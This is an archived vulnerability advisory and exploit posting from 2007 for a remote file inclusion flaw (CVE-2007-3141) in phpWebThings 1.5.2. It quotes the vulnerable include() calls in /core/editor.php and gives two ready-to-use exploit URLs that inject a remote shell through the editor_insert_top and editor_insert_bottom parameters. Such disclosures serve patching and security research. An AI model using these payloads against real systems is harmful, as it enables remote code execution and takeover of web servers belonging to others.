Bug: phpWebThings ==>1.5.2 RFI (WLB-2007060047 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: phpWebThings ==>1.5.2 RFI
 Credit: titanichacker
 Date: 2007.06.12
 CWE: CWE-98 (Show similar)
 CVE: CVE-2007-3141 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
High
No
Yes

************
*script:phpWebThings ==>1.5.2 RFI
*
*dir url:http://sourceforge.net/project/showfiles.php?group_id=19103
*
*author:titanichacker
*
*c0ntact:the-modest-pirate (at) hotmail (dot) com [email concealed]
*
*H.P: hack-teach.com & mohandko.com & tryag.com
*
*bug in:
*
*(/core/editor.php)
*include($editor_insert_top);
*include($editor_insert_bottom);
*
*exploit:
*
*http://victim/path/core/editor.php?editor_insert_top=[shell]
*http://victim/path/core/editor.php?editor_insert_bottom=[shell]
*

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com